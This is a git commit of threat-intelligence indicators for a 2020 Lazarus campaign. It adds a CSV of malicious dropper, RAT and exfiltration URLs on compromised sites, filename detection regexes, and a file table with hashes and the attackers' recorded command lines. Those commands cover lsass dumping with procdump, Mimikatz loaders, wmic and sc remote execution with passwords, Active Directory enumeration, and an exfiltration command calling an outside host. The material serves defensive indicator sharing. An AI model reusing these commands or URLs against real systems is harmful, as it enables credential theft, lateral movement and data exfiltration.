2020.12.15.Lazarus_Campaign

This commit is contained in:
cybermonitor 2020-12-16 10:58:15 +08:00
parent 07dc07725c
commit cfe54e2b9a
8 changed files with 424 additions and 0 deletions

@ -0,0 +1 @@
This work is licensed under the Creative Commons Attribution-NonCommercial 4.0 International License. To view a copy of this license, visit http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to Creative Commons, PO Box 1866, Mountain View, CA 94042, USA.

@ -0,0 +1,44 @@
Category,URL,FQDN
Dropper,https://www.anca-aste.it/uploads/form/02E319AF73A33547343B71D5CB1064BC.dotm,www.anca-aste.it
Dropper,https://www.fabianiarte.com/uploads/imgup/21it-23792.jpg,www.fabianiarte.com
Dropper,https://www.forecareer.com/gdcareer/officetemplate-20nab.asp?iqxml=NVcareer183991,www.forecareer.com
Persistence DLL,http://support.medicalinthecloud.com/TechCenter/include/slide.asp,support.medicalinthecloud.com
Persistence DLL,http://pennontraders.com/assets/slides/view.jsp,pennontraders.com
RAT Component,http://125.206.177.152/old/viewer.php,125.206.177.152
RAT Component,http://www.hirokawaunso.co.jp/wordpress/wp-includes/review.php,www.hirokawaunso.co.jp
RAT Component,http://indoweb.org/love/data/common/common.php,indoweb.org
RAT Component,http://admin.shcpa.co.kr/_asapro2/formmail/lib.php,admin.shcpa.co.kr
RAT Component,https://premier-inn.jp/,premier-inn.jp
RAT Component,http://137.74.114.227/theveniaux/webliotheque/public/css/main.php,137.74.114.227
RAT Component,https://bootcamp-coders.cnm.edu/~dmcdonald21/emoji-review/storage/framework.php,bootcamp-coders.cnm.edu
RAT Component,https://yakufreshperu.com/facturacion/public/css/main.php,yakufreshperu.com
Exfiltration,https://www.gonnelli.it/uploads/catalogo/thumbs/thumb.asp,www.gonnelli.it
Exfiltration,https://www.astedams.it/photos/image/image.asp,www.astedams.it
Uncategorized,https://vega.mh-tec.jp/.well-known/index.php,vega.mh-tec.jp
Uncategorized,https://www.index-consulting.jp/eng/news/index.php,www.index-consulting.jp
Uncategorized,https://www.apars-surgery.org/bbs/bbs_files/board_photo/menu.php,www.apars-surgery.org
Uncategorized,https://prestigein-am.jp/akita/wp-includes/wp-rss1.php,prestigein-am.jp
Uncategorized,https://www.lyzeum.com/popup/popup.asp,www.lyzeum.com
Uncategorized,https://www.calculadoras.mx/themes/pack/pilot.php,www.calculadoras.mx
Uncategorized,http://www.anisweb.org/layout/site/style/preview.jsp,www.anisweb.org
Uncategorized,https://www.shikshakibaat.com/classes/detail.jsp,www.shikshakibaat.com
Uncategorized,http://www.mannpublicwhseltd.com/cservice.asp,www.mannpublicwhseltd.com
Uncategorized,https://acanicjquery.com/slides/style.php,acanicjquery.com
Uncategorized,https://genieaccount.com/images/common/common.asp,genieaccount.com
Uncategorized,https://turnscor.com/ACT/images/slide/view.jsp,turnscor.com
Uncategorized,https://www.arumdaunresort.com/admin/html/user/contact.asp,www.arumdaunresort.com
Uncategorized,https://www.astedams.it/photos/image/image.asp,www.astedams.it
Uncategorized,https://www.automercado.co.cr/empleo/css/main.jsp,www.automercado.co.cr
Uncategorized,https://www.curiofirenze.com/include/inc-site.asp,www.curiofirenze.com
Uncategorized,https://www.emilypress.com/CMWorking/Static/service/center.asp,www.emilypress.com
Uncategorized,https://www.fabianiarte.com/pdf/thumbs/thumb.asp,www.fabianiarte.com
Uncategorized,https://www.fidesarte.it/thumb/multibox/style/common.asp,www.fidesarte.it
Uncategorized,https://www.hansolhope.or.kr/welfare/notice/view.jsp,www.hansolhope.or.kr
Uncategorized,https://www.paghera.com/content/view/thumb/info.asp,www.paghera.com
Uncategorized,https://www.reseau-canope.fr/conventions/css/en/edit.jsp,www.reseau-canope.fr
Uncategorized,https://www.sanlorenzoyacht.com/newsl/include/inc-map.asp,www.sanlorenzoyacht.com
Uncategorized,https://95octane.com/,95octane.com
Uncategorized,https://www.factmag.com/,www.factmag.com
Uncategorized,https://www.gonnelli.it,www.gonnelli.it
Uncategorized,https://www.leemble.com/,www.leemble.com
Uncategorized,https://www.ne-ba.org/,www.ne-ba.org
1 Category URL FQDN
2 Dropper https://www.anca-aste.it/uploads/form/02E319AF73A33547343B71D5CB1064BC.dotm www.anca-aste.it
3 Dropper https://www.fabianiarte.com/uploads/imgup/21it-23792.jpg www.fabianiarte.com
4 Dropper https://www.forecareer.com/gdcareer/officetemplate-20nab.asp?iqxml=NVcareer183991 www.forecareer.com
5 Persistence DLL http://support.medicalinthecloud.com/TechCenter/include/slide.asp support.medicalinthecloud.com
6 Persistence DLL http://pennontraders.com/assets/slides/view.jsp pennontraders.com
7 RAT Component http://125.206.177.152/old/viewer.php 125.206.177.152
8 RAT Component http://www.hirokawaunso.co.jp/wordpress/wp-includes/review.php www.hirokawaunso.co.jp
9 RAT Component http://indoweb.org/love/data/common/common.php indoweb.org
10 RAT Component http://admin.shcpa.co.kr/_asapro2/formmail/lib.php admin.shcpa.co.kr
11 RAT Component https://premier-inn.jp/ premier-inn.jp
12 RAT Component http://137.74.114.227/theveniaux/webliotheque/public/css/main.php 137.74.114.227
13 RAT Component https://bootcamp-coders.cnm.edu/~dmcdonald21/emoji-review/storage/framework.php bootcamp-coders.cnm.edu
14 RAT Component https://yakufreshperu.com/facturacion/public/css/main.php yakufreshperu.com
15 Exfiltration https://www.gonnelli.it/uploads/catalogo/thumbs/thumb.asp www.gonnelli.it
16 Exfiltration https://www.astedams.it/photos/image/image.asp www.astedams.it
17 Uncategorized https://vega.mh-tec.jp/.well-known/index.php vega.mh-tec.jp
18 Uncategorized https://www.index-consulting.jp/eng/news/index.php www.index-consulting.jp
19 Uncategorized https://www.apars-surgery.org/bbs/bbs_files/board_photo/menu.php www.apars-surgery.org
20 Uncategorized https://prestigein-am.jp/akita/wp-includes/wp-rss1.php prestigein-am.jp
21 Uncategorized https://www.lyzeum.com/popup/popup.asp www.lyzeum.com
22 Uncategorized https://www.calculadoras.mx/themes/pack/pilot.php www.calculadoras.mx
23 Uncategorized http://www.anisweb.org/layout/site/style/preview.jsp www.anisweb.org
24 Uncategorized https://www.shikshakibaat.com/classes/detail.jsp www.shikshakibaat.com
25 Uncategorized http://www.mannpublicwhseltd.com/cservice.asp www.mannpublicwhseltd.com
26 Uncategorized https://acanicjquery.com/slides/style.php acanicjquery.com
27 Uncategorized https://genieaccount.com/images/common/common.asp genieaccount.com
28 Uncategorized https://turnscor.com/ACT/images/slide/view.jsp turnscor.com
29 Uncategorized https://www.arumdaunresort.com/admin/html/user/contact.asp www.arumdaunresort.com
30 Uncategorized https://www.astedams.it/photos/image/image.asp www.astedams.it
31 Uncategorized https://www.automercado.co.cr/empleo/css/main.jsp www.automercado.co.cr
32 Uncategorized https://www.curiofirenze.com/include/inc-site.asp www.curiofirenze.com
33 Uncategorized https://www.emilypress.com/CMWorking/Static/service/center.asp www.emilypress.com
34 Uncategorized https://www.fabianiarte.com/pdf/thumbs/thumb.asp www.fabianiarte.com
35 Uncategorized https://www.fidesarte.it/thumb/multibox/style/common.asp www.fidesarte.it
36 Uncategorized https://www.hansolhope.or.kr/welfare/notice/view.jsp www.hansolhope.or.kr
37 Uncategorized https://www.paghera.com/content/view/thumb/info.asp www.paghera.com
38 Uncategorized https://www.reseau-canope.fr/conventions/css/en/edit.jsp www.reseau-canope.fr
39 Uncategorized https://www.sanlorenzoyacht.com/newsl/include/inc-map.asp www.sanlorenzoyacht.com
40 Uncategorized https://95octane.com/ 95octane.com
41 Uncategorized https://www.factmag.com/ www.factmag.com
42 Uncategorized https://www.gonnelli.it www.gonnelli.it
43 Uncategorized https://www.leemble.com/ www.leemble.com
44 Uncategorized https://www.ne-ba.org/ www.ne-ba.org

@ -0,0 +1,7 @@
\\~DF[A-Fa-f0-9]{3,4}\.(tmp|TMP|dat|DAT|txt|TXT|bat|BAT|bin|BIN)$
\\~TMP[0-9]{3,3}\.(dat|DAT|bin|BIN)$
\\~TMP\.[0-9]{4,4}$
\\CMP[A-Fa-f0-9]{3,4}\.(tmp|TMP|dat|DAT|bat|BAT|bin|BIN)$
\\FOUND[0-9]{3,3}\.CHK$
\\IBM[0-9]{3,3}([A-Za-z]{1,3}[0-9]?)?\.(bin|BIN|dat|DAT|bat|BAT)$
\\IBM[A-Z][0-9]{3,3}\.(bin|BIN|dat|DAT|bat|BAT)$

@ -0,0 +1,113 @@
Id,File,Comment,MD5,SHA-1,SHA-256,Command line
1,C:\ProgramData\IBM\IBM.dat,ADfind,707ec5c00170cee6e9879803c316eac6,0301d79dd37658a0434c0d04148defa3e0385b07,cfd201ede3ebc0deb0031983b2bda9fc54e24d244063ed323b0e421a535cff92,"C:\windows\system32\cmd.exe /c C:\ProgramData\IBM\IBM.DAT -b dc=<DC>,dc=<DC>,dc=<DC> -f ""objectcategory=organizationalUnit"" CanonicalName -nodn -csv > C:\ProgramData\IBM\ou.dat 2>&1
c:\windows\system32\cmd.exe /c C:\ProgramData\IBM\IBM.DAT -b dc=<DC>,dc=<DC>,dc=<DC> -f ""objectcategory=person"" cn sAMAccountName description distinguishedName objectSid whenCreated whenChanged lastLogon pwdLastSet lastLogonTimestamp memberof -tdc -nodn -csv > C:\ProgramData\IBM\user.dat 2>&1
c:\windows\system32\cmd.exe /c C:\ProgramData\IBM\IBM.DAT -b dc=<DC>,dc=<DC>,dc=<DC> -f ""objectcategory=computer"" cn sAMAccountName distinguishedName operatingSystem operatingSystemVersion objectSid ms-ds-creatorsid whenCreated whenChanged -tdc -nodn -csv > C:\ProgramData\IBM\com.dat 2>&1
c:\windows\system32\cmd.exe /c C:\ProgramData\IBM\IBM.DAT -b dc=<DC>,dc=<DC>,dc=<DC> -f ""objectcategory=group"" name distinguishedName memberof -nodn -csv > C:\ProgramData\IBM\group.dat 2>&1"
2,C:\ProgramData\Kagent.exe,ADfind,9b02dd2a1a15e94922be3f85129083ac,2cb6ff75b38a3f24f3b60a2742b6f4d6027f0f2a,b1102ed4bca6dae6f2f498ade2f73f76af527fa803f0e0b46e100d4cf5150682,
3,bnotices.php,b347k web shell on C2,,,,
4,C:\ProgramData\FreePDF\ntuser.bat,Batch to execute commands,c7ec4d246cbc3567728c095976c73414,,,
5,C:\ProgramData\gather.bat,Batch to execute commands,31cd25127b283d001e3a9a43a95bcb85,,,
6,C:\ProgramData\IBM\ntuser.bat,Batch to execute commands,c7ec4d246cbc3567728c095976c73414,,,"cmd.exe /c ""wmic /NODE:<HOSTNAME> /USER:<DOMAIN>\<USER> /PASSWORD:<PASSWORD> PROCESS CALL CREATE ""cmd.exe /c c:\ProgramData\IBM\ntuser.bat"" > C:\Windows\TEMP\~DF90A3.tmp"" 2>&1"
7,C:\ProgramData\Intel\DAL\ntuser.bat,Batch to execute commands,,,,"wmic /NODE:<HOSTNAME> /USER:<DOMAIN>\<USER> /PASSWORD:<PASSWORD> PROCESS CALL CREATE ""cmd.exe /c C:\ProgramData\Intel\DAL\ntuser.bat"""
8,C:\ProgramData\USOShared\uso.bat,Batch to execute commands,,,,
9,C:\RECYCLER\rclc.bat,Batch to execute commands,,,,"cmd.exe /c ""sc \\192.168.2.11 create RPCMGR binPath= ""cmd.exe /c c:\RECYCLER\rclc.bat"" > C:\Users\<USER>\AppData\Local\Temp\~DFD384.tmp"" 2>&1"
10,C:\ProgramData\comms\gather.bat,Batch to start Persistence DLL,,,,
11,C:\ProgramData\gat.bat,Batch to start Persistence DLL,ed49368b051117833a5fb6af03508634,,,
12,C:\ProgramData\comms.bat,Batch to start Persistence DLL comms.io,a9732bb0ad1bb4ad732cbe5714def4d5,,,
13,BoeingPDF.exe,Dropper,5618b70e7ddc1064282fc90b93fe6c34,,,E:\BoeingPDF.exe
14,BoeingPDF.iso,Dropper iso container,,,,
15,c:\RECYCLER\~DF011.DAT,Encrypted Mimikatz BLOB,631da819149e4fee25b06e1da377382c,643041e60643d735054a28199ed30f96be58d445,179c77f392f804a5266b36205d043ee7fc6b0273a6c31f8590960df505f6ad0c,
16,C:\ProgramData\UniqueId\~DF234.TMP,Executable for exfiltration,254a7a0c1db2bea788ca826f4b5bf51a,,,C:\ProgramData\IBM\~DF234.TMP S0RMM-50QQE-F65DN-DCPYN-5QEQA https://www.gonnelli.it/uploads/catalogo/thumbs/thumb.asp C:\ProgramData\IBM\restore002.dat data05 10000 -p 192.168.1.240 8080
17,C:\ProgramData\IBM\IBM122.DAT,Loader for encrypted Mimikatz variant,6f7b837ee3cb27712ec13751d4c8a7f5,,,C:\ProgramData\IBM\IBM122.DAT C:\ProgramData\IBM\IBM121.DAT Z17FDaciCdAbXrRe Y0hKcGRtbHNaV2RsT2pwa1pXSjFaeXh6Wld0MWNteHpZVG82Ykc5bmIyNXdZWE56ZDI5eVpITT0=
18,c:\RECYCLER\~DF012.TMP,Loader for encrypted Mimikatz variant,82968937f1846b7e8cd94dde420fd5f1,3a4dcfe286693ca435d3408fe813b53671bf1286,42e4a9aeff3744bbbc0e82fd5b93eb9b078460d8f40e0b61b27b699882f521be,~DF012.TMP -f c:\RECYCLER\~DF011.TXT c:\RECYCLER\~DF011.DAT 1q2w3e4r@#$@#$@#$
19,C:\solr\~DF010.TMP,Loader for encrypted Mimikatz variant,,,,"cmd.exe /c ""wmic /NODE:192.168.1.84 /USER:<DOMAIN>\<USER> /PASSWORD:<PASSWORD PROCESS CALL CREATE ""c:\solr\~DF010.TMP -f c:\solr\~DF011.TXT c:\solr\~DF011.TMP 1q2w3e4r@#$@#$@#$"" > C:\Users\<USER>\AppData\Local\Temp\~DF8E8D.tmp"" 2>&1"
20,C:\ProgramData\gom\gom_3d.dat,lsass.exe process memory,,,,
21,BAE_FMV_SOF.docx,Malicious phishing document,bd0c929701308c84e67479adb719367c,533b08aa5225084066df648a30ca107daa66a941,08a75ad3195d4e389786d338519913bbd86fb8112c2cf5c729297387207ce6e7,
22,Boeing_Defense_PM.docx,Malicious phishing document,,,,
23,Boeing_GS.docx,Malicious phishing document,,,,
24,Boeing_Spectrolab.docx,Malicious phishing document,,,,
25,C:\ProgramData\IBM\SearchProtocol.exe,MS17-010 exploit,,f09d9c7783adb4a44d48c77e412319e1c9cd4384,,C:\ProgramData\IBM\SearchProtocol.exe C:\ProgramData\IBM\SearchProtocol.cache HC7k08UOgflouO8i 192.168.1.17 C:\ProgramData\IBM\SearchProtocols.dmp C:\ProgramData\IBM\SearchProtocols.mdmp
26,%TEMP%\CMP3894.tmp,Output,,,,
27,%TEMP%\CMPC42B.tmp,Output,453654d6f43ff6bc4ea51d7a706b1c53,,,C:\ProgramData\Intel\DAL\~TMP123.DAT H:\ 0 C:\Users\<USER>\AppData\Local\Temp\CMPC42B.tmp (Directory listing of drive)
28,%TEMP%\TMP37F7.tmp,Output,,,,
29,%TEMP%\TMPC40A.tmp,Output,,,,
30,C:\Windows\system32\Drivers\pssdk-proto.sys,Packet Sniffer service DLL,37ee8c694dadbc2f38a1d27b4bca0f8d,ebfe815b75d5ece5d595042d73ba331658af0d98,8a3998c88c64ec6009247cb9901f1baec181558299521b2f367883cbebae0ba4,
31,%LOCALAPPDATA%\VirtualStore\ProgramData\ssh\putty.io,Persistence DLL,,,,"c:\windows\system32\rundll32.exe c:\programdata\ssh\putty.io, ProjectView DJiMKWMV2cicZyoW"
32,C:\ProgramData\~DF565.TMP,Persistence DLL,657127b2bdb10dcce9a6fa693abdf5a8,,,
33,C:\ProgramData\comms.io,Persistence DLL,,,,
34,C:\ProgramData\Comms\comms.io,Persistence DLL,5dea069f7bcee467ca20145ceecc5378,,,
35,C:\ProgramData\desktop.ini,Persistence DLL,4f3556b6d9c884c696a5a929d450cf2d,,,"c:\windows\system32\rundll32.exe C:\ProgramData\desktop.ini,json_object_get_unicode_string 3XXKiU6J0QfZPHdH9SA5nZa3GpIqvgK7"
36,C:\ProgramData\Git\GitClone.db,Persistence DLL,,,,"c:\windows\system32\rundll32.exe c:\programdata\Git\GitClone.db, ProjectView DJiMKWMV2cicZyoW"
37,C:\ProgramData\Intel\cache.io,Persistence DLL,,,,
38,C:\ProgramData\Microsoft\MSSqlite3DB.evt.pol.dat,Persistence DLL,,B10C3FB3D826049E04C246D86C552200926086CB,,"rundll32.exe C:\ProgramData\Microsoft\MSSqlite3DB.evt.pol.dat,sqlite3_create_functionex NujsFYJNTpws664RGNruaKSu12TdGVYt"
39,C:\ProgramData\ThumbNail\thumbnail.db,Persistence DLL,,,,"c:\windows\system32\rundll32.exe ""C:\ProgramData\ThumbNail\thumbnail.db"", CtrlPanel S-6-81-3811-75432205-060098-6872 0 0 900 1"
40,C:\ProgramData\Windows\ntuser.dat,Persistence DLL,,,,"C:\windows\system32\rundll32.exe C:\ProgramData\Windows\ntuser.dat,CMS_ContentInfo {216B0291-15BF-D688-1700-4CFEE40B5330}"
41,C:\Users\Public\FontCache.dat,Persistence DLL,3358c93ca892f145d303a005262d7a3d,,,"C:\Windows\System32\rundll32.exe C:\Users\Public\FontCache.dat,ilBindComponent WLFNjCysJmJZD22En4fKd3fTfRqXASqK"
42,%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\GitClone.lnk,Persistence LNK,,,,
43,%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\NavCache.lnk,Persistence LNK for C:\ProgramData\Intel\cache.io,,,,
44,%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\MSPolicy.lnk,Persistence LNK for C:\ProgramData\Microsoft\MSSqlite3DB.evt.pol.dat,,,,
45,%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\OneNote.lnk,Persistence LNK for C:\Users\Public\FontCache.dat,,,,
46,C:\ProgramData\ntusers.pool,Persitence DLL,1256b1f01c08ad10bb36c6b4ca0b2a00,,,"C:\Windows\System32\rundll32.exe C:\ProgramData\ntusers.pool,ilBindComponent nVhIq5ifeTQiuOhmQC51dK1DEnyUWk7h"
47,C:\ProgramData\IBM\igfxmnr.exe,RAR,4c2a76ceee9becfeffe78265166182ba,c70b71f7aa367d88c6ec5942269a45cbc66510b3,ea139458b4e88736a3d48e81569178fd5c11156990b6a90e2d35f41b1ad9bac1,"C:\ProgramData\IBM\igfxmnr.exe a -hp1q2w3e4 -m5 ""C:\ProgramData\IBM\restore01.dat"" ""C:\ProgramData\IBM\IBM010J.DAT""
C:\ProgramData\IBM\igfxmnr.exe a -hp1q2w3e4 -m5 ""C:\ProgramData\IBM\restore06.dat"" ""\\<DOMAINCONTROLLER>\SYSVOL\<FQDN>\scripts\"""
48,C:\ProgramData\Intel\DAL\igfxmnr.exe,RAR,4c2a76ceee9becfeffe78265166182ba,c70b71f7aa367d88c6ec5942269a45cbc66510b3,ea139458b4e88736a3d48e81569178fd5c11156990b6a90e2d35f41b1ad9bac1,
49,C:\ProgramData\Wagent.exe,RAR,070d15cd95c14784606ecaa88657551e,2ca084a8cb5b3b7869d019a01e13882782521a07,cf0121cd61990fd3f436bda2b2aff035a2621797d12fd02190ee0f9b2b52a75d,
50,C:\ProgramData\IBM\~df099.dat,RAT component,,,,
51,C:\ProgramData\Intel\DAL\~TMP015.DAT,RAT component,1b1afed4d2107648fa959bb738e25350,,,"cmd.exe /c ""sc \\<HOSTNAME> create rpcmgr binPath= ""cmd.exe /c c:\ProgramData\Intel\DAL\~TMP015.DAT -p 0x57AC098B"" > C:\Users\<USER>\AppData\Local\Temp\~DFE3B6.tmp"" 2>&1"
52,C:\ProgramData\Intel\DAL\~TMP123.DAT,RAT component,,,,"C:\ProgramData\Intel\DAL\~TMP123.DAT -p 0x57AC098B
POST http://www.hirokawaunso.co.jp/wordpress/wp-includes/review.php?no=23485&unm=9986812&rtss=100&query=basic"
53,C:\ProgramData\Microsoft\DeviceSync\DeviceCaches.DMP,RAT component,,,,cmd.exe /c C:\ProgramData\Microsoft\DeviceSync\DeviceCaches.DMP -p 0x53A4C60B 
54,C:\ProgramData\ntuser.io,RAT component,ab252b14053c7c13ecc668773fa26ee5,,08875e26ca1a5e089590f6e9b681f328cc484a1a899dd07caa6fc4e738e6cfbc,cmd.exe /c C:\ProgramData\RAgent.exe OneDrive-USOPriv
55,C:\ProgramData\ssh\ssh_tmp088.tmp,RAT component,aa85312c372738e889847608798b3b1a,,,"cmd.exe /c ""sc \\<HOSTNAME> create RPCMGR binPath= ""cmd.exe /c c:\ProgramData\ssh\ssh_tmp088.tmp -p 0x57AC098B"" > C:\Users\<USER>\AppData\Local\Temp\~DF693C.tmp"" 2>&1"
56,C:\ProgramData\USOShared\USO.TMP,RAT component,657127b2bdb10dcce9a6fa693abdf5a8,,,"C:\ProgramData\USOShared\USO.TMP -p 0x57AC098B
cmd.exe /c ""reg add ""HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"" /v USOShare /t REG_SZ /d ""C:\ProgramData\USOShared\USO.TMP -p 0x57AC098B"" > C:\Windows\TEMP\~DF16D1.tmp"" 2>&1"
57,C:\RECYCLER\~TMP.0312.bin,RAT component,,,,"cmd.exe /c ""sc \\192.168.1.17 create RPCMGR binPath= ""cmd.exe /c c:\RECYCLER\~TMP.0312.bin -p 0x57AC098B"" > C:\Users\<USER>\AppData\Local\Temp\~DFBF01.tmp"" 2>&1
cmd.exe /c ""wmic /NODE:192.168.1.17 /USER:workgroup\tempAdmins /PASSWORD:1q2w3e4r5t!@#$ PROCESS CALL CREATE ""c:\RECYCLER\~TMP.0312.bin -p 0x57AC098B"" > C:\Users\<USER>\AppData\Local\Temp\~DF8CA9.tmp"" 2>&1"
58,C:\users\public\~df098.tmp,RAT component,,,,"cmd.exe /c ""sc \\<HOSTNAME> create RPCMGR binPath= ""cmd.exe /c c:\ProgramData\Veeam\~DF098.TMP -p 0x57AC098B"" > C:\Users\<USER>\AppData\Local\Temp\~DFEF26.tmp"" 2>&1
cmd.exe /c ""sc \\<HOSTNAME> create RPCMGR binPath= ""cmd.exe /c taskkill /im ~DF098.TMP /f"" > C:\Users\<USER>\AppData\Local\Temp\~DFC309.tmp"" 2>&1"
59,chromeviewer.exe,RAT component,78df38b31b2c944e42a9a934ee206940,,,
60,C:\Windows\sam.txt,SAM dump,,,,
61,C:\ProgramData\IBM\IBM011.BIN,SMB scanner,,,,IBM011.BIN 192.168.1.1 192.168.1.255 10 C:\ProgramData\IBM\IBM011RMU.DAT workgroup\Administrator password 1
62,C:\ProgramData\Cisco\CAGT.EXE,SMBMAP,6b69acebbdd63c3010c752e8321c13e0,,,C:\ProgramData\Cisco\cagt.exe -u <USER> -d <DOMAIN> -p aad3b435b51404eeaad3b435b51404ee:<NTHASH> -H 192.168.1.134 -r C$\ProgramData
63,C:\ProgramData\gom\gom_3d.exe,SysInternals procdump,be046bab4a23f8db568535aaea565f87,,,C:\ProgramData\gom\gom_3d.exe -accepteula -ma lsass -o c:\ProgramData\gom\gom_3d.dat
64,%LOCALAPPDATA%\ntuser.log1,Unknown,,,,
65,%TEMP%\~DFFAC3.tmp,Unknown,,,,
66,C:\ProgramData\FreePDF\~df088.dat,Unknown,,,,
67,C:\ProgramData\FreePDF\~df099.dat,Unknown,,,,
68,C:\ProgramData\FreePDF\~df456.dat,Unknown,,,,
69,C:\ProgramData\FreePDF\~df456.tmp,Unknown,,,,
70,C:\ProgramData\FreePDF\~df565.tmp,Unknown,,,,
71,C:\ProgramData\FreePDF\DF033.TMP,Unknown,,,,
72,c:\ProgramData\FreePDF\DF080.TMP,Unknown,,,,
73,C:\ProgramData\FreePDF\DF234.TMP,Unknown,,,,
74,C:\ProgramData\FreePDF\DF343.TMP,Unknown,,,,
75,C:\ProgramData\FreePDF\DF435.TMP,Unknown,,,,
76,c:\ProgramData\FreePDF\DF565.TMP,Unknown,,,,
77,C:\ProgramData\Intel\NavCache.io,Unknown,,,,
78,C:\ProgramData\itp11\cache3_5001238963-ENC.cache,Unknown,,,,
79,C:\ProgramData\itp11\cache3_5001238964-ENC.cache,Unknown,,,,
80,C:\ProgramData\Microsoft\DeviceSync\Deviceinc.db,Unknown,,,,
81,C:\ProgramData\Microsoft\DeviceSync\Devicemdb.db,Unknown,,,,
82,C:\ProgramData\Microsoft\DeviceSync\Devicestg.db,Unknown,,,,
83,C:\ProgramData\Microsoft\DeviceSync\Devicestg.db,Unknown,,,,
84,C:\ProgramData\Microsoft\DeviceSync\DF235.TMP,Unknown,,,,
85,C:\ProgramData\Microsoft\DeviceSync\DF333.TMP,Unknown,,,,
86,C:\ProgramData\Microsoft\DeviceSync\gather.bat,Unknown,,,,
87,C:\ProgramData\USOShared\pkg.db,Unknown,,,,
88,C:\Windows\System32\irmon.dll,Unknown,,,,
89,C:\Windows\System32\srservice.dll,Unknown,,,,
90,C:\Windows\System32\srsvc.dll,Unknown,,,,
91,C:\ProgramData\Cisco\Client.exe,Unknown executable,f453dd430e160b4c07a9bc9f7c7e7bca,,,
92,C:\ProgramData\cookie.dat,Unknown executable,92d9e6ccef0e41f5bf47b1a9f213ddbf,,,
93,C:\ProgramData\Intel\cache.exe,Unknown executable,7ba191c703f24ccb04bfba4a931686f6,,,
94,C:\ProgramData\Intel\DAL\~TMP323.DAT,Unknown executable,2852022f7a2e360e863cff1793eaa098,,,
95,C:\ProgramData\Intel\iCLS.exe,Unknown executable,3415c8deefb3e7fb3394d411ebf33292,,,
96,C:\ProgramData\Intel\SearchProtocol.bin,Unknown executable,,,,C:\ProgramData\Intel\SearchProtocol.bin 10128 C:\ProgramData\Intel\gather.bat
97,C:\ProgramData\UAgent.exe,Unknown executable,648e7cee1afd1d0998cda0b2b8d826ae,,,
98,C:\ProgramData\UIU\ui.exe,Unknown executable,,,,
99,C:\ProgramData\USOShared\~DF099.DAT,Unknown executable,,,,C:\ProgramData\USOShared\~DF099.DAT \\<HOSTNAME>\<SHARE>\<FOLDER> 0 C:\ProgramData\USOShared\<HOSTNAME>.bin
100,C:\Users\Public\DF090.TMP,Unknown executable,,,,"sc \\<HOSTNAME> create RPCMGR binPath= ""cmd.exe /c c:\ProgramData\Veeam\~DF090.TMP 3 c:\ProgramData\Veeam\ntuser.bat"""
101,C:\Windows\System32\pchsvc.dll,Unknown service DLL,,,,"cmd.exe /c dir /a pchsvc.dll
cmd.exe /c ""del \\<HOSTNAME>\c$\windows\system32\pchsvc.dll > C:\Users\<USER>\AppData\Local\Temp\~DFD584.tmp"" 2>&1"
102,GD1029581823.docx,Malicious phishing document,9524af8a52cb7edc52838dcc95d00b81,9e3672862bf00791bc01d0bbf7209edee3d7d3b6,f12f87d56e9291ddea6f5db23b9f6066dbeb52ff06e14640e5a36418b5a9ea02,
103,InternalPDFViewer.exe,RipplePDF viewer with unknown Hash,97724b3c86ebd723112eee4ec2c56e04,a44736d896c670fd0bf72c7535da7bdb0d00e9ba,36bd69a0bd334ea28b7c53091425421bf78f79e6007133a46c7c597bc660d9c8,
1 Id File Comment MD5 SHA-1 SHA-256 Command line
2 1 C:\ProgramData\IBM\IBM.dat ADfind 707ec5c00170cee6e9879803c316eac6 0301d79dd37658a0434c0d04148defa3e0385b07 cfd201ede3ebc0deb0031983b2bda9fc54e24d244063ed323b0e421a535cff92 C:\windows\system32\cmd.exe /c C:\ProgramData\IBM\IBM.DAT -b dc=<DC>,dc=<DC>,dc=<DC> -f "objectcategory=organizationalUnit" CanonicalName -nodn -csv > C:\ProgramData\IBM\ou.dat 2>&1 c:\windows\system32\cmd.exe /c C:\ProgramData\IBM\IBM.DAT -b dc=<DC>,dc=<DC>,dc=<DC> -f "objectcategory=person" cn sAMAccountName description distinguishedName objectSid whenCreated whenChanged lastLogon pwdLastSet lastLogonTimestamp memberof -tdc -nodn -csv > C:\ProgramData\IBM\user.dat 2>&1 c:\windows\system32\cmd.exe /c C:\ProgramData\IBM\IBM.DAT -b dc=<DC>,dc=<DC>,dc=<DC> -f "objectcategory=computer" cn sAMAccountName distinguishedName operatingSystem operatingSystemVersion objectSid ms-ds-creatorsid whenCreated whenChanged -tdc -nodn -csv > C:\ProgramData\IBM\com.dat 2>&1 c:\windows\system32\cmd.exe /c C:\ProgramData\IBM\IBM.DAT -b dc=<DC>,dc=<DC>,dc=<DC> -f "objectcategory=group" name distinguishedName memberof -nodn -csv > C:\ProgramData\IBM\group.dat 2>&1
3 2 C:\ProgramData\Kagent.exe ADfind 9b02dd2a1a15e94922be3f85129083ac 2cb6ff75b38a3f24f3b60a2742b6f4d6027f0f2a b1102ed4bca6dae6f2f498ade2f73f76af527fa803f0e0b46e100d4cf5150682
4 3 bnotices.php b347k web shell on C2
5 4 C:\ProgramData\FreePDF\ntuser.bat Batch to execute commands c7ec4d246cbc3567728c095976c73414
6 5 C:\ProgramData\gather.bat Batch to execute commands 31cd25127b283d001e3a9a43a95bcb85
7 6 C:\ProgramData\IBM\ntuser.bat Batch to execute commands c7ec4d246cbc3567728c095976c73414 cmd.exe /c "wmic /NODE:<HOSTNAME> /USER:<DOMAIN>\<USER> /PASSWORD:<PASSWORD> PROCESS CALL CREATE "cmd.exe /c c:\ProgramData\IBM\ntuser.bat" > C:\Windows\TEMP\~DF90A3.tmp" 2>&1
8 7 C:\ProgramData\Intel\DAL\ntuser.bat Batch to execute commands wmic /NODE:<HOSTNAME> /USER:<DOMAIN>\<USER> /PASSWORD:<PASSWORD> PROCESS CALL CREATE "cmd.exe /c C:\ProgramData\Intel\DAL\ntuser.bat"
9 8 C:\ProgramData\USOShared\uso.bat Batch to execute commands
10 9 C:\RECYCLER\rclc.bat Batch to execute commands cmd.exe /c "sc \\192.168.2.11 create RPCMGR binPath= "cmd.exe /c c:\RECYCLER\rclc.bat" > C:\Users\<USER>\AppData\Local\Temp\~DFD384.tmp" 2>&1
11 10 C:\ProgramData\comms\gather.bat Batch to start Persistence DLL
12 11 C:\ProgramData\gat.bat Batch to start Persistence DLL ed49368b051117833a5fb6af03508634
13 12 C:\ProgramData\comms.bat Batch to start Persistence DLL comms.io a9732bb0ad1bb4ad732cbe5714def4d5
